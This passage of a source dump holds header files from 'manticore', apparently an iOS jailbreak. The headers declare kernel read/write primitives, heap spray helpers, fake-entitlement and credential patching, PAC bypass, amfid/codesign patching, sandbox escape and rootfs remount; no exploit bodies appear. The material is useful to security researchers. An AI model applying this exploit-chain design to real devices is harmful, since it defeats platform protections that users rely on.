84 | qexternal size_t OFFSET(IOSurfaceRootUserClient, surfaceClients);
85 | qexternal size_t OFFSET(IOSurfaceClient, surface);
86 | qexternal size_t OFFSET(IOSurface, values);
87 |
88 | // Parameters for VNode/VMount.
89 | qexternal size_t OFFSET(vnode, vmount);
90 |
91 | qexternal kptr_t kc_kernel_base;
92 | qexternal kptr_t kc_kernel_map;
93 | qexternal kptr_t kc_kernel_task;
94 | qexternal kptr_t kc_IOSurfaceClient_vt;
95 | qexternal kptr_t kc_IOSurfaceClient_vt_0;
96 |
97 | #undef qexternal
98 |
99 | #ifdef __cplusplus
100 | extern "C" {
101 | #endif
102 |
103 | void kernel_offsets_init(void);
104 |
105 | #ifdef __cplusplus
106 | }
107 | #endif
108 |
109 | #endif /* k_offsets_h */
110 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/k_utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // k_utils.h
3 | // exploit-1
4 | //
5 | // Created by Quote on 2020/12/24.
6 | // Copyright © 2020 Quote. All rights reserved.
7 | //
8 |
9 | #ifndef k_utils_h
10 | #define k_utils_h
11 | typedef uint64_t kptr_t;
12 |
13 | #ifdef __cplusplus
14 | extern "C" {
15 | #endif
16 |
17 | struct kDictEntry {
18 | kptr_t key;
19 | kptr_t value;
20 | };
21 |
22 | struct kOSDict {
23 | kptr_t self_addr;
24 | kptr_t items_addr;
25 | uint32_t count;
26 | uint32_t cap;
27 | char **names;
28 | struct kDictEntry *items;
29 | char data[0];
30 | };
31 |
32 |
33 | kptr_t kproc_find_pid0(kptr_t proc);
34 | kptr_t kproc_find_by_pid(pid_t pid);
35 | kptr_t ipc_entry_lookup(mach_port_t port_name);
36 | kptr_t port_name_to_ipc_port(mach_port_t port_name);
37 | kptr_t port_name_to_kobject(mach_port_t port_name);
38 | void debug_dump_ipc_port(mach_port_t port_name, kptr_t *kobj);
39 | void proc_write_MACF(kptr_t proc, struct kOSDict *macf);
40 | void prepare_fake_entitlements(void);
41 | struct kDictEntry *borrow_fake_entitlement(const char *name);
42 | struct kOSDict *proc_fetch_MACF(kptr_t proc);
43 | void debug_dump_proc_cred(kptr_t proc);
44 |
45 | #ifdef __cplusplus
46 | }
47 | #endif
48 |
49 | #endif /* k_utils_h */
50 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/kapi.h:
--------------------------------------------------------------------------------
1 | //
2 | // kapi.h
3 | // ios-fuzzer
4 | //
5 | // Created by Quote on 2021/1/22.
6 | // Copyright © 2021 Quote. All rights reserved.
7 | //
8 |
9 | #ifndef kapi_h
10 | #define kapi_h
11 |
12 | #include
13 | #include
14 |
15 | #include
16 |
17 | __BEGIN_DECLS
18 |
19 | extern mach_port_t kernel_task_port;
20 |
21 | #ifdef __cplusplus
22 | extern "C" {
23 | #endif
24 |
25 | extern void (^stage0_read)(kptr_t addr, void *data, size_t len);
26 | extern uint32_t (^stage0_read32)(kptr_t addr);
27 | extern uint64_t (^stage0_read64)(kptr_t addr);
28 | extern kptr_t (^stage0_read_kptr)(kptr_t addr);
29 |
30 | extern void (^stage0_write)(kptr_t addr, void *data, size_t len);
31 | extern void (^stage0_write64)(kptr_t addr, uint64_t v);
32 |
33 | void kapi_read(kptr_t addr, void *data, size_t len);
34 | uint32_t kapi_read32(kptr_t addr);
35 | uint64_t kapi_read64(kptr_t addr);
36 | kptr_t kapi_read_kptr(kptr_t addr);
37 |
38 | void kapi_write(kptr_t addr, void *data, size_t len);
39 | bool kapi_write32(kptr_t addr, uint32_t value);
40 | bool kapi_write64(kptr_t addr, uint64_t value);
41 |
42 | #ifdef __cplusplus
43 | }
44 | #endif
45 |
46 | __END_DECLS
47 |
48 | #endif /* kapi_h */
49 |
50 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/tq_common_p.h:
--------------------------------------------------------------------------------
1 | //
2 | // mycommon.h
3 | // ios-fuzzer
4 | //
5 | // Created by Quote on 2021/1/26.
6 | // Copyright © 2021 Quote. All rights reserved.
7 | //
8 |
9 | #ifndef mycommon_h
10 | #define mycommon_h
11 |
12 | #include
13 | #include
14 |
15 | #define arrayn(array) (sizeof(array)/sizeof((array)[0]))
16 |
17 | typedef uint64_t kptr_t; // 64 bit CPU only
18 |
19 | struct exploit_common_s {
20 | bool debug;
21 | bool has_PAC;
22 | const char *model;
23 | const char *osversion;
24 | const char *osproductversion;
25 | const char *machine;
26 | const char *kern_version;
27 |
28 | int64_t physmemsize;
29 | uint64_t pagesize;
30 |
31 | kptr_t kernel_base;
32 | kptr_t kernel_task;
33 | kptr_t kernel_map;
34 | kptr_t kernel_proc;
35 |
36 | kptr_t self_proc;
37 | kptr_t self_task;
38 | kptr_t self_task_pac;
39 | kptr_t self_ipc_space;
40 | kptr_t kernel_slide;
41 |
42 | kptr_t text_slide;
43 | kptr_t data_slide;
44 | kptr_t zone_array;
45 |
46 | uint32_t num_zones;
47 | };
48 |
49 | extern struct exploit_common_s g_exp;
50 |
51 | #ifdef __cplusplus
52 | extern "C" {
53 | #endif
54 |
55 | uint32_t iosurface_create_fast(void);
56 | uint32_t iosurface_s_get_ycbcrmatrix(void);
57 | void iosurface_s_set_indexed_timestamp(uint64_t v);
58 |
59 | void sys_init(void);
60 | void print_os_details(void);
61 |
62 | #ifdef __cplusplus
63 | }
64 | #endif
65 |
66 | #endif /* mycommon_h */
67 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/user_kernel_alloc.h:
--------------------------------------------------------------------------------
1 | //
2 | // user_kernel_alloc.h
3 | // exploit-1
4 | //
5 | // Created by Quote on 2020/12/30.
6 | // Copyright © 2020 Quote. All rights reserved.
7 | //
8 |
9 | #ifndef user_kernel_alloc_h
10 | #define user_kernel_alloc_h
11 |
12 | #ifdef __cplusplus
13 | extern "C" {
14 | #endif
15 |
16 | bool IOSurface_init(void);
17 |
18 | int *create_pipes(size_t *pipe_count);
19 | void close_pipes(int *pipefds, size_t pipe_count);
20 | void pipe_close(int pipefds[2]);
21 | size_t pipe_spray(const int *pipefds, size_t pipe_count,
22 | void *pipe_buffer, size_t pipe_buffer_size,
23 | void (^update)(uint32_t pipe_index, void *data, size_t size));
24 |
25 | #ifdef __cplusplus
26 | }
27 | #endif
28 |
29 | #endif /* user_kernel_alloc_h */
30 |
--------------------------------------------------------------------------------
/manticore/include/lib/tq/utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // utils.h
3 | // exploit-1
4 | //
5 | // Created by Quote on 2020/12/24.
6 | // Copyright © 2020 Quote. All rights reserved.
7 | //
8 |
9 | #ifndef utils_h
10 | #define utils_h
11 |
12 | #include
13 | #include
14 |
15 | #ifdef __cplusplus
16 | extern "C" {
17 | #endif
18 |
19 | void util_hexprint(void *data, size_t len, const char *desc);
20 | void util_hexprint_width(void *data, size_t len, int width, const char *desc);
21 | void util_nanosleep(uint64_t nanosecs);
22 | void util_msleep(unsigned int ms);
23 | _Noreturn void fail_info(const char *info);
24 | void fail_if(bool cond, const char *fmt, ...) __printflike(2, 3);
25 |
26 | // don't like macro
27 | void util_debug(const char *fmt, ...) __printflike(1, 2);
28 | void util_info(const char *fmt, ...) __printflike(1, 2);
29 | void util_warning(const char *fmt, ...) __printflike(1, 2);
30 | void util_error(const char *fmt, ...) __printflike(1, 2);
31 | void util_printf(const char *fmt, ...) __printflike(1, 2);
32 |
33 | int util_runCommand(const char *cmd, ...);
34 |
35 | void post_exploit(void);
36 |
37 | #ifdef __cplusplus
38 | }
39 | #endif
40 |
41 | #endif /* utils_h */
42 |
--------------------------------------------------------------------------------
/manticore/include/manticore/amfid.h:
--------------------------------------------------------------------------------
1 | //
2 | // amfid.h
3 | // reton
4 | //
5 | // Created by Luca on 18.02.21.
6 | //
7 |
8 | #ifndef amfid_h
9 | #define amfid_h
10 |
11 | #ifdef __cplusplus
12 | extern "C" {
13 | #endif
14 |
15 | kern_return_t mach_vm_region (vm_map_t target_task,
16 | mach_vm_address_t *address,
17 | mach_vm_size_t *size,
18 | vm_region_flavor_t flavor,
19 | vm_region_info_t info,
20 | mach_msg_type_number_t *infoCnt,
21 | mach_port_t *object_name);
22 |
23 | #ifdef __cplusplus
24 | }
25 | #endif
26 |
27 | kptr_t perform_amfid_patches();
28 |
29 | #endif /* amfid_h */
30 |
--------------------------------------------------------------------------------
/manticore/include/manticore/jailbreak.h:
--------------------------------------------------------------------------------
1 | //
2 | // jailbreak.h
3 | // reton
4 | //
5 | // Created by Luca on 15.02.21.
6 | //
7 |
8 |
9 | #ifndef jailbreak_h
10 | #define jailbreak_h
11 |
12 | #include
13 |
14 | #ifdef __cplusplus
15 | extern "C" {
16 | #endif
17 |
18 | int jailbreak(void);
19 | bool setup_manticore_filesystem(void);
20 | uint64_t root_patch(uint64_t task_pac);
21 | int sb_allow_ndefault(void);
22 | bool check_sandbox_escape(void);
23 |
24 | #ifdef __cplusplus
25 | }
26 | #endif
27 |
28 | #endif /* jailbreak_h */
29 |
--------------------------------------------------------------------------------
/manticore/include/manticore/kernel_utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // kernel_utils.h
3 | // reton
4 | //
5 | // Created by Luca on 18.02.21.
6 | //
7 |
8 | #ifndef kernel_utils_h
9 | #define kernel_utils_h
10 |
11 | #include
12 |
13 | #define OFFSET(base_, object_) _##base_##__##object_##__offset_
14 | typedef unsigned long long addr_t;
15 |
16 | #ifdef __cplusplus
17 | extern "C" {
18 | #endif
19 |
20 | bool execute_with_kernel_credentials(void (^function)(void));
21 | kptr_t get_proc_struct_for_pid(pid_t pid);
22 | bool set_platform_binary(kptr_t proc, bool set);
23 | kptr_t find_vnode_with_fd(kptr_t proc, int fd);
24 |
25 | kptr_t give_creds_to_proc_at_addr(kptr_t proc, kptr_t cred_addr);
26 | bool execute_with_credentials(kptr_t proc, kptr_t credentials, void (^function)(void));
27 |
28 |
29 | size_t kread(kptr_t where, void* p, size_t size);
30 | kptr_t find_allproc();
31 | uint64_t proc_of_pid(pid_t pid);
32 | kptr_t find_vnode_with_fd(kptr_t proc, int fd);
33 |
34 | #ifdef __cplusplus
35 | }
36 | #endif
37 |
38 | #endif /* kernel_utils_h */
39 |
--------------------------------------------------------------------------------
/manticore/include/manticore/pac.h:
--------------------------------------------------------------------------------
1 | //
2 | // pac.h
3 | // manticore
4 | //
5 | // Created by Luca on 30.04.21.
6 | //
7 |
8 | #ifndef pac_h
9 | #define pac_h
10 |
11 | bool bypassPAC(void);
12 |
13 | #endif /* pac_h */
14 |
--------------------------------------------------------------------------------
/manticore/include/manticore/rootfs.h:
--------------------------------------------------------------------------------
1 | //
2 | // rootfs.h
3 | // reton
4 | //
5 | // Created by Luca on 18.02.21.
6 | //
7 |
8 | #ifndef rootfs_h
9 | #define rootfs_h
10 |
11 | #include
12 |
13 | #ifdef __cplusplus
14 | extern "C" {
15 | #endif
16 |
17 | void start_rootfs_remount(void);
18 | int remount_rootfs(kptr_t proc);
19 | bool check_root_write(void);
20 | bool check_root_read(void);
21 |
22 | #ifdef __cplusplus
23 | }
24 | #endif
25 |
26 | #endif /* rootfs_h */
27 |
--------------------------------------------------------------------------------
/manticore/include/manticore/utils.h:
--------------------------------------------------------------------------------
1 | //
2 | // utils.h
3 | // reton
4 | //
5 | // Created by Luca on 18.02.21.
6 | //
7 |
8 | #include
9 |
10 |
11 | struct proc_cred {
12 | char posix_cred[0x100]; // HACK big enough
13 | kptr_t cr_label;
14 | kptr_t sandbox_slot;
15 | };
16 |
17 | #ifdef __cplusplus
18 | extern "C" {
19 | #endif
20 |
21 | static struct kOSDict *self_macf;
22 | bool patch_TF_PLATFORM(kptr_t task);
23 | void proc_set_root_cred(kptr_t proc, struct proc_cred **old_cred);
24 | int perform_root_patches(kptr_t ucred);
25 | char *get_path_for_pid(pid_t pid);
26 | pid_t pid_of_process(const char *name);
27 | bool restartSpringBoard(void);
28 | int runCommandv(const char *cmd, int argc, const char * const* argv, void (^unrestrict)(pid_t), bool wait, bool quiet);
29 | pid_t look_for_proc(const char *proc_name);
30 | pid_t look_for_proc_basename(const char *base_name);
31 | void patch_amfid(pid_t amfid_pid);
32 | void patch_codesign(void);
33 | bool setCSFlagsByPID(pid_t pid);
34 | void *CDHashFor(char *file);
35 | bool isSymlink(const char *filename);
36 | bool isDirectory(const char *filename);
37 | bool isMountpoint(const char *filename);
38 | bool deleteFile(const char *file);
39 | bool ensureDirectory(const char *directory, int owner, mode_t mode);
40 | bool ensureSymlink(const char *to, const char *from);
41 | bool ensureFile(const char *file, int owner, mode_t mode);
42 | int waitForFile(const char *filename);
43 | void *userspace_PAC_hack(mach_port_t target_thread, void *pc);
44 | #ifdef __cplusplus
45 | }
46 | #endif
47 |
--------------------------------------------------------------------------------
/manticore/include/offset_finder/offset_finder.h:
--------------------------------------------------------------------------------
1 | //
2 | // offset_finder.h
3 | // manticore
4 | //
5 | // Created by admin on 8/3/21.
6 | //
7 |
8 | #ifndef offset_finder_h
9 | #define offset_finder_h
10 |
11 | kptr_t get_kernel_cred_addr(kptr_t kernel_proc);
12 | kptr_t get_kernel_vm_map(kptr_t kernel_task);
13 |
14 | kptr_t find_kernel_task(void *kbase, size_t ksize);
15 | void init_offset_finder(kptr_t kernel_base);
16 |
17 | #endif /* offset_finder_h */
18 |
--------------------------------------------------------------------------------
/manticore/include/util/alloc.h:
--------------------------------------------------------------------------------
1 | //
2 | // alloc.h
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef alloc_h
9 | #define alloc_h
10 |
11 | #include
12 |
13 | #define SafeFree(x) do { if (x) free(x); } while (false)
14 | #define SafeFreeNULL(x) do { SafeFree(x); (x) = NULL; } while (false)
15 |
16 | #define SafeAlloc(x, sz) do { x = (typeof(x))malloc(sizeof(*x)); MANTICORE_THROW_ON_NULL(x); } while (false)
17 |
18 | #endif /* alloc_h */
19 |
--------------------------------------------------------------------------------
/manticore/include/util/arm.h:
--------------------------------------------------------------------------------
1 | //
2 | // arm.h
3 | // manticore
4 | //
5 | // Created by 21 on 14.03.21.
6 | //
7 |
8 | #ifndef arm_h
9 | #define arm_h
10 |
11 | int is_pac(void);
12 |
13 | #endif /* arm_h */
14 |
--------------------------------------------------------------------------------
/manticore/include/util/error.hpp:
--------------------------------------------------------------------------------
1 | //
2 | // error.hpp
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef error_h
9 | #define error_h
10 |
11 | #include
12 |
13 | /* handy macros for sanity checking */
14 | /* fairly self explanatory */
15 | #define MANTICORE_THROW_ON_FALSE_WITH_MSG(COND, M) if (!(COND)) { manticore_throw("assert failed (%s:%d): %s", __FILE__, __LINE__, M); }
16 | #define MANTICORE_THROW_ON_FALSE(COND) MANTICORE_THROW_ON_FALSE_WITH_MSG(COND, #COND)
17 | #define MANTICORE_THROW_ON_NULL(P) MANTICORE_THROW_ON_FALSE_WITH_MSG((P != NULL), #P " should not be null")
18 |
19 | #endif /* error_h */
20 |
--------------------------------------------------------------------------------
/manticore/include/util/file.h:
--------------------------------------------------------------------------------
1 | //
2 | // file.h
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef file_h
9 | #define file_h
10 |
11 | #define fileExists(file) ([[NSFileManager defaultManager] fileExistsAtPath:@(file)])
12 |
13 | #endif /* file_h */
14 |
--------------------------------------------------------------------------------
/manticore/include/util/kutils.h:
--------------------------------------------------------------------------------
1 | //
2 | // kutils.h
3 | // manticore
4 | //
5 | // Created by admin on 7/3/21.
6 | //
7 |
8 | #ifndef kutils_h
9 | #define kutils_h
10 |
11 | #include
12 | #include
13 |
14 | typedef unsigned long long addr_t;
15 | typedef uint64_t kptr_t;
16 |
17 | typedef mach_port_t vm_map_t;
18 |
19 | #define KPTR_NULL ((kptr_t) 0)
20 | #define VM_MIN_KERNEL_ADDRESS 0xffffffe000000000ULL
21 | #define VM_MAX_KERNEL_ADDRESS 0xfffffff3ffffffffULL
22 | #define KERN_POINTER_VALID(val) (((val) & 0xffffffff) != 0xdeadbeef && (val) >= VM_MIN_KERNEL_ADDRESS && (val) <= VM_MAX_KERNEL_ADDRESS)
23 | #define KERN_POINTER_INVALID(val) (!KERN_POINTER_VALID(val))
24 |
25 | #define TF_PLATFORM 0x00000400 /* task is a platform binary */
26 |
27 |
28 | #endif /* kutils_h */
29 |
--------------------------------------------------------------------------------
/manticore/include/util/log.hpp:
--------------------------------------------------------------------------------
1 | //
2 | // log.hpp
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef _util_log_h
9 | #define _util_log_h
10 |
11 | enum manticore_log_level {
12 | LOG_DEBUG,
13 | LOG_INFO,
14 | LOG_WARN,
15 | LOG_ERROR,
16 | LOG_FATAL
17 | };
18 |
19 | enum manticore_var_dump_type {
20 | _MANTICORE_DUMP_START,
21 |
22 | /* non array types */
23 | /* char types */
24 | MANTICORE_DUMP_C,
25 |
26 | /* integer types */
27 | MANTICORE_DUMP_I8,
28 | MANTICORE_DUMP_U8,
29 | MANTICORE_DUMP_I16,
30 | MANTICORE_DUMP_U16,
31 | MANTICORE_DUMP_I32,
32 | MANTICORE_DUMP_U32,
33 | MANTICORE_DUMP_I64,
34 | MANTICORE_DUMP_U64,
35 |
36 | /* fp types */
37 | MANTICORE_DUMP_F32,
38 | MANTICORE_DUMP_F64,
39 | MANTICORE_DUMP_F128,
40 |
41 | /* pointer types */
42 | MANTICORE_DUMP_PTR,
43 |
44 | /* array types (todo: VLAs) */
45 | /* char types */
46 | MANTICORE_DUMP_C_ARR,
47 |
48 | /* integer types */
49 | MANTICORE_DUMP_I8_ARR,
50 | MANTICORE_DUMP_U8_ARR,
51 | MANTICORE_DUMP_I16_ARR,
52 | MANTICORE_DUMP_U16_ARR,
53 | MANTICORE_DUMP_I32_ARR,
54 | MANTICORE_DUMP_U32_ARR,
55 | MANTICORE_DUMP_I64_ARR,
56 | MANTICORE_DUMP_U64_ARR,
57 |
58 | /* fp types */
59 | MANTICORE_DUMP_F32_ARR,
60 | MANTICORE_DUMP_F64_ARR,
61 | MANTICORE_DUMP_F128_ARR,
62 |
63 | /* pointer types */
64 | MANTICORE_DUMP_PTR_ARR,
65 |
66 | /* other */
67 | MANTICORE_DUMP_STR,
68 |
69 | _MANTICORE_DUMP_END
70 | };
71 |
72 | /*!
73 | @function manticore_register_dump_var
74 | Registers a variable that will be dumped on a non recoverable exception
75 |
76 | @param type
77 | The type of variable to be added.
78 | For char: MANTICORE_DUMP_C
79 | For 32 bit signed int: MANTICORE_DUMP_I32
80 | For 128 bit IEEE754: MANTICORE_DUMP_F128
81 | etc
82 | For arrays, append the _ARR suffix to the type
83 |
84 | @param v
85 | A pointer to the variable to be registered
86 |
87 | @param len
88 | If this variable is an array, set this to the length of the array, else set this to 1
89 |
90 | @param pretty_name
91 | When dumping the state, if a pretty name is supplied then the pretty name will be printed alongside the variable
92 | */
93 | bool manticore_register_dump_var(enum manticore_var_dump_type type, void *v, unsigned long long len, const char *pretty_name);
94 | bool manticore_register_dump_var(enum manticore_var_dump_type type, void *v);
95 | bool manticore_register_dump_var(enum manticore_var_dump_type type, void *v, const char *pretty_name);
96 | bool manticore_register_dump_var(enum manticore_var_dump_type type, void *v, unsigned long long len);
97 |
98 | #ifdef __cplusplus
99 | extern "C" {
100 | #endif
101 |
102 | /*!
103 | @function manticore_throw
104 | Throws a non catchable error, will not return
105 |
106 | @param fmt
107 | Format string, like passed to functions such as `printf`, `sprintf` etc
108 |
109 | @param ...
110 | variadic args
111 | */
112 | __attribute__((noreturn)) void manticore_throw(const char *fmt, ...);
113 | /*!
114 | @function manticore_(error|warn|info|debug)
115 | Prints a (error|warn|info|debug) message
116 |
117 | @param fmt
118 | Format string, like passed to functions such as `printf`, `sprintf` etc
119 |
120 | @param ...
121 | variadic args
122 | */
123 | void manticore_error(const char *fmt, ...);
124 | void manticore_warn(const char *fmt, ...);
125 | void manticore_info(const char *fmt, ...);
126 | void manticore_debug(const char *fmt, ...);
127 |
128 | /* when calling from C, only 4 arg variant is available */
129 | void manticore_register_dump_var_type_v_len_name(enum manticore_var_dump_type type, void *v, unsigned long long len, const char *pretty_name);
130 | void manticore_register_dump_var_type_v(enum manticore_var_dump_type type, void *v, unsigned long long len, const char *pretty_name);
131 | void manticore_register_dump_var_type_v_name(enum manticore_var_dump_type type, void *v, unsigned long long len, const char *pretty_name);
132 | void manticore_register_dump_var_type_v_len(enum manticore_var_dump_type type, void *v, unsigned long long len, const char *pretty_name);
133 |
134 | #ifdef __cplusplus
135 | }
136 | #endif
137 |
138 | #endif /* log_h */
139 |
--------------------------------------------------------------------------------
/manticore/include/util/mach_vm.h:
--------------------------------------------------------------------------------
1 | /*
2 | * mach_vm.h
3 | * Brandon Azad
4 | */
5 | #ifndef OOB_TIMESTAMP__MACH_VM__H_
6 | #define OOB_TIMESTAMP__MACH_VM__H_
7 |
8 | #include
9 |
10 | extern
11 | kern_return_t mach_vm_allocate
12 | (
13 | vm_map_t target,
14 | mach_vm_address_t *address,
15 | mach_vm_size_t size,
16 | int flags
17 | );
18 |
19 | extern
20 | kern_return_t mach_vm_deallocate
21 | (
22 | vm_map_t target,
23 | mach_vm_address_t address,
24 | mach_vm_size_t size
25 | );
26 |
27 | extern
28 | kern_return_t mach_vm_protect
29 | (
30 | vm_map_t target_task,
31 | mach_vm_address_t address,
32 | mach_vm_size_t size,
33 | boolean_t set_maximum,
34 | vm_prot_t new_protection
35 | );
36 |
37 | extern
38 | kern_return_t mach_vm_write
39 | (
40 | vm_map_t target_task,
41 | mach_vm_address_t address,
42 | vm_offset_t data,
43 | mach_msg_type_number_t dataCnt
44 | );
45 |
46 | extern
47 | kern_return_t mach_vm_read_overwrite
48 | (
49 | vm_map_t target_task,
50 | mach_vm_address_t address,
51 | mach_vm_size_t size,
52 | mach_vm_address_t data,
53 | mach_vm_size_t *outsize
54 | );
55 |
56 | extern
57 | kern_return_t mach_vm_remap
58 | (
59 | vm_map_t target_task,
60 | mach_vm_address_t *target_address,
61 | mach_vm_size_t size,
62 | mach_vm_offset_t mask,
63 | int flags,
64 | vm_map_t src_task,
65 | mach_vm_address_t src_address,
66 | boolean_t copy,
67 | vm_prot_t *cur_protection,
68 | vm_prot_t *max_protection,
69 | vm_inherit_t inheritance
70 | );
71 |
72 | extern
73 | kern_return_t mach_vm_region_recurse
74 | (
75 | vm_map_t target_task,
76 | mach_vm_address_t *address,
77 | mach_vm_size_t *size,
78 | natural_t *nesting_depth,
79 | vm_region_recurse_info_t info,
80 | mach_msg_type_number_t *infoCnt
81 | );
82 |
83 | #endif
84 |
--------------------------------------------------------------------------------
/manticore/include/util/plistutils.h:
--------------------------------------------------------------------------------
1 | //
2 | // plistutils.h
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef plistutils_h
9 | #define plistutils_h
10 |
11 | #import
12 |
13 | /* whoever wrote these, can you add docstrings please? -fugiefire */
14 | bool modifyPlist(NSString *filename, void (^function)(id));
15 | NSDictionary *readPlist(NSString *filename);
16 | bool createEmptyPlist(NSString *filename);
17 |
18 | #endif /* plistutils_h */
19 |
--------------------------------------------------------------------------------
/manticore/include/util/sys_vers.h:
--------------------------------------------------------------------------------
1 | //
2 | // sys_vers.h
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef sys_vers_h
9 | #define sys_vers_h
10 |
11 | #define SYSTEM_VERSION_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedSame)
12 | #define SYSTEM_VERSION_GREATER_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedDescending)
13 | #define SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedAscending)
14 | #define SYSTEM_VERSION_LESS_THAN(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedAscending)
15 | #define SYSTEM_VERSION_LESS_THAN_OR_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedDescending)
16 |
17 | #endif /* sys_vers_h */
18 |
--------------------------------------------------------------------------------
/manticore/include/util/util.h:
--------------------------------------------------------------------------------
1 | //
2 | // util.h
3 | // manticore
4 | //
5 | // Created by fugiefire on 7/3/21.
6 | //
7 |
8 | #ifndef util_h
9 | #define util_h
10 |
11 | /*!
12 | @function programVersion
13 | Gets the CFBundleVersion
14 |
15 | @return
16 | The CFBundleVersion of this app
17 | */
18 | NSString *programVersion()
19 |
20 | #endif /* util_h */
21 |
--------------------------------------------------------------------------------
/manticore/include/xnu/iokit/IOKit/IOReturn.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. The rights granted to you under the License
10 | * may not be used to create, or enable the creation or redistribution of,
11 | * unlawful or unlicensed copies of an Apple operating system, or to
12 | * circumvent, violate, or enable the circumvention or violation of, any
13 | * terms of an Apple operating system software license agreement.
14 | *
15 | * Please obtain a copy of the License at
16 | * http://www.opensource.apple.com/apsl/ and read it before using this file.
17 | *
18 | * The Original Code and all software distributed under the License are
19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
23 | * Please see the License for the specific language governing rights and
24 | * limitations under the License.
25 | *
26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
27 | */
28 | /*
29 | * HISTORY
30 | */
31 |
32 | /*
33 | * Core IOReturn values. Others may be family defined.
34 | */
35 |
36 | #ifndef __IOKIT_IORETURN_H
37 | #define __IOKIT_IORETURN_H
38 |
39 | #ifdef __cplusplus
40 | extern "C" {
41 | #endif
42 |
43 | #ifndef PLATFORM_DriverKit
44 |
45 | #include
46 |
47 | #else /* PLATFORM_DriverKit */
48 |
49 | #ifdef DRIVERKIT_PRIVATE
50 |
51 | #include
52 |
53 | #else /* DRIVERKIT_PRIVATE */
54 |
55 | typedef int kern_return_t;
56 |
57 | #define KERN_SUCCESS 0
58 |
59 | /*
60 | * error number layout as follows:
61 | *
62 | * hi lo
63 | * | system(6) | subsystem(12) | code(14) |
64 | */
65 |
66 | #define err_none (kern_return_t)0
67 | #define ERR_SUCCESS (kern_return_t)0
68 |
69 | #define err_system(x) ((signed)((((unsigned)(x))&0x3f)<<26))
70 | #define err_sub(x) (((x)&0xfff)<<14)
71 |
72 | #define err_get_system(err) (((err)>>26)&0x3f)
73 | #define err_get_sub(err) (((err)>>14)&0xfff)
74 | #define err_get_code(err) ((err)&0x3fff)
75 |
76 | #define err_max_system 0x3f
77 |
78 | #define system_emask (err_system(err_max_system))
79 | #define sub_emask (err_sub(0xfff))
80 | #define code_emask (0x3fff)
81 |
82 | #endif /* DRIVERKIT_PRIVATE */
83 |
84 | #endif /* PLATFORM_DriverKit */
85 |
86 | typedef kern_return_t IOReturn;
87 |
88 | #ifndef sys_iokit
89 | #define sys_iokit err_system(0x38)
90 | #endif /* sys_iokit */
91 | #define sub_iokit_common err_sub(0)
92 | #define sub_iokit_usb err_sub(1)
93 | #define sub_iokit_firewire err_sub(2)
94 | #define sub_iokit_block_storage err_sub(4)
95 | #define sub_iokit_graphics err_sub(5)
96 | #define sub_iokit_networking err_sub(6)
97 | #define sub_iokit_bluetooth err_sub(8)
98 | #define sub_iokit_pmu err_sub(9)
99 | #define sub_iokit_acpi err_sub(10)
100 | #define sub_iokit_smbus err_sub(11)
101 | #define sub_iokit_ahci err_sub(12)
102 | #define sub_iokit_powermanagement err_sub(13)
103 | #define sub_iokit_hidsystem err_sub(14)
104 | #define sub_iokit_scsi err_sub(16)
105 | #define sub_iokit_usbaudio err_sub(17)
106 | #define sub_iokit_wirelesscharging err_sub(18)
107 | //#define sub_iokit_pccard err_sub(21)
108 | #ifdef PRIVATE
109 | #define sub_iokit_nvme err_sub(28)
110 | #endif
111 | #define sub_iokit_thunderbolt err_sub(29)
112 | #define sub_iokit_graphics_acceleration err_sub(30)
113 | #define sub_iokit_keystore err_sub(31)
114 | #ifdef PRIVATE
115 | #define sub_iokit_smc err_sub(32)
116 | #endif
117 | #define sub_iokit_apfs err_sub(33)
118 | #define sub_iokit_acpiec err_sub(34)
119 | #define sub_iokit_timesync_avb err_sub(35)
120 |
121 | #define sub_iokit_platform err_sub(0x2A)
122 | #define sub_iokit_audio_video err_sub(0x45)
123 | #define sub_iokit_cec err_sub(0x46)
124 | #define sub_iokit_baseband err_sub(0x80)
125 | #define sub_iokit_HDA err_sub(0xFE)
126 | #define sub_iokit_hsic err_sub(0x147)
127 | #define sub_iokit_sdio err_sub(0x174)
128 | #define sub_iokit_wlan err_sub(0x208)
129 | #define sub_iokit_appleembeddedsleepwakehandler err_sub(0x209)
130 | #define sub_iokit_appleppm err_sub(0x20A)
131 |
132 | #define sub_iokit_vendor_specific err_sub(-2)
133 | #define sub_iokit_reserved err_sub(-1)
134 |
135 | #define iokit_common_err(return ) (sys_iokit|sub_iokit_common|return)
